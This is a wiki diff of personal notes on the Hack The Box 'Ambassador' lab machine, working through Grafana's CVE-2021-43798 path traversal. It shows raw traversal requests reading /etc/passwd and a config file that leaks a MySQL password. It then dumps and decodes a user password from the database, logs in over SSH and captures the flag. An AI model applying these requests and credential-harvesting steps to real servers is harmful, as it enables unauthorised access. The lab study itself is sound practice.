Differences

This shows you the differences between two versions of the page.

--- ex:htb:ambassador:start [2022/12/22 10:51] – ebaer
+++ ex:htb:ambassador:start [2022/12/22 17:44] (current) – ebaer
@@ Line 135: / Line 135: @@
 ====== Grafana - Port 3000 ======
+  * Version 8.2.0 -> CVE-2021-43798
 <code>
@@ Line 165: / Line 167: @@
 </code>
+<code>
+https://github.com/A-D-Team/grafanaExp
+./grafanaExp_linux_amd64 exp -u "http://10.129.228.56:3000"
+/12/22 11:15:24 Target vulnerable has plugin [alertlist]
+/12/22 11:15:24 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
+/12/22 11:15:24 There is [0] records in db.
+/12/22 11:15:24 type:[mysql]	name:[mysql.yaml]		url:[]	user:[grafana]	password[]	database:[grafana]	basic_auth_user:[]	basic_auth_password:[]
+/12/22 11:15:24 All Done, have nice day!
+</code>
+===== RFI CVE-2021-43798 =====
+<code>
+GET /public/plugins/alertlist/../../../../../../../../etc/passwd HTTP/1.1
+Host: 10.129.228.56:3000
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: redirect_to=%2Fpublic%2Fplugins%2Fmysql%2F
+Connection: close
+</code>
+<code>
+root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:106::/nonexistent:/usr/sbin/nologin
+syslog:x:104:110::/home/syslog:/usr/sbin/nologin
+_apt:x:105:65534::/nonexistent:/usr/sbin/nologin
+tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false
+uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin
+landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin
+pollinate:x:110:1::/var/cache/pollinate:/bin/false
+usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+sshd:x:112:65534::/run/sshd:/usr/sbin/nologin
+systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
+developer:x:1000:1000:developer:/home/developer:/bin/bash
+lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false
+grafana:x:113:118::/usr/share/grafana:/bin/false
+mysql:x:114:119:MySQL Server,,,:/nonexistent:/bin/false
+consul:x:997:997::/home/consul:/bin/false
+</code>
+<code>
+GET /public/plugins/alertlist/../../../../../../../../var/www/html/index.html
+</code>
+<code>
+/etc/grafana/provisioning/datasources/mysql.yaml
+GET /public/plugins/alertlist/../../../../../../../../etc/grafana/provisioning/datasources/mysql.yaml HTTP/1.1
+HTTP/1.1 200 OK
+Accept-Ranges: bytes
+Cache-Control: no-cache
+Content-Length: 180
+Content-Type: application/x-yaml
+Expires: -1
+Last-Modified: Fri, 02 Sep 2022 00:56:07 GMT
+Pragma: no-cache
+X-Content-Type-Options: nosniff
+X-Frame-Options: deny
+X-Xss-Protection: 1; mode=block
+Date: Thu, 22 Dec 2022 13:26:24 GMT
+Connection: close
+apiVersion: 1
+datasources:
+ - name: mysql.yaml
+   type: mysql
+   host: localhost
+   database: grafana
+   user: grafana
+   password: dontStandSoCloseToMe63221!
+   editable: false
+</code>
+===== msf mysql enum =====
+<code>
+msf6 > use auxiliary/admin/mysql/mysql_enum
+msf6 auxiliary(admin/mysql/mysql_enum) > show info
+       Name: MySQL Enumeration Module
+     Module: auxiliary/admin/mysql/mysql_enum
+    License: Metasploit Framework License (BSD)
+       Rank: Normal
+Provided by:
+  Carlos Perez <carlos_perez@darkoperator.com>
+Check supported:
+  No
+Basic options:
+  Name      Current Setting  Required  Description
+  ----      ---------------  --------  -----------
+  PASSWORD                   no        The password for the specified username
+  RHOSTS                     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+  RPORT     3306             yes       The target port (TCP)
+  USERNAME                   no        The username to authenticate as
+Description:
+  This module allows for simple enumeration of MySQL Database Server
+  provided proper credentials to connect remotely.
+References:
+  https://cisecurity.org/benchmarks.html
+View the full module info with the info -d command.
+msf6 auxiliary(admin/mysql/mysql_enum) > set PASSWORD dontStandSoCloseToMe63221!
+PASSWORD => dontStandSoCloseToMe63221!
+msf6 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 10.129.228.56
+RHOSTS => 10.129.228.56
+msf6 auxiliary(admin/mysql/mysql_enum) > set username grafana
+username => grafana
+msf6 auxiliary(admin/mysql/mysql_enum) > set ConnectTimeout 30
+ConnectTimeout => 30
+msf6 auxiliary(admin/mysql/mysql_enum) > run
+</code>
+-> Timeout (anti metasploit measures?)
+===== MySQL manual =====
+<code>
+show databases;
+use information_schema
+select * from tables;
+| def           | whackywidget       | users                                                | BASE TABLE  | InnoDB             |      10 | Dynamic    |          0 |              0 |       16384 |               0 |            0 |         0 |           NULL | 2022-09-02 00:49:04 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
+| def           | performance_schema | innodb_redo_log_files                                | BASE TABLE  | PERFORMANCE_SCHEMA |      10 | Dynamic    |          1 |              0 |           0 |               0 |            0 |         0 |           NULL | 2022-12-22 09:31:21 | NULL        | NULL       | utf8mb4_0900_ai_ci |     NULL |                                       |                                          |
++---------------+--------------------+------------------------------------------------------+-------------+--------------------+---------+------------+------------+----------------+-------------+-----------------+--------------+-----------+----------------+---------------------+-------------+------------+--------------------+----------+---------------------------------------+------------------------------------------+
+rows in set (0.325 sec)
+MySQL [information_schema]>  use whackywidget;
+Reading table information for completion of table and column names
+You can turn off this feature to get a quicker startup with -A
+Database changed
+MySQL [whackywidget]> show tables;
++------------------------+
+| Tables_in_whackywidget |
++------------------------+
+| users                  |
++------------------------+
+row in set (0.048 sec)
+MySQL [whackywidget]> select * from users;
++-----------+------------------------------------------+
+| user      | pass                                     |
++-----------+------------------------------------------+
+| developer | YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg== |
++-----------+------------------------------------------+
+row in set (0.047 sec)
+</code>
+<code>
+echo "YW5FbmdsaXNoTWFuSW5OZXdZb3JrMDI3NDY4Cg==" | base64 -d
+anEnglishManInNewYork027468
+</code>
+<code>
+sh developer@10.129.228.56
+developer@10.129.228.56's password:
+Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-126-generic x86_64)
+[...]
+Last login: Fri Sep  2 02:33:30 2022 from 10.10.0.1
+developer@ambassador:~$ cat user.txt
+bdff80ba21c478079a3332f785c4ddba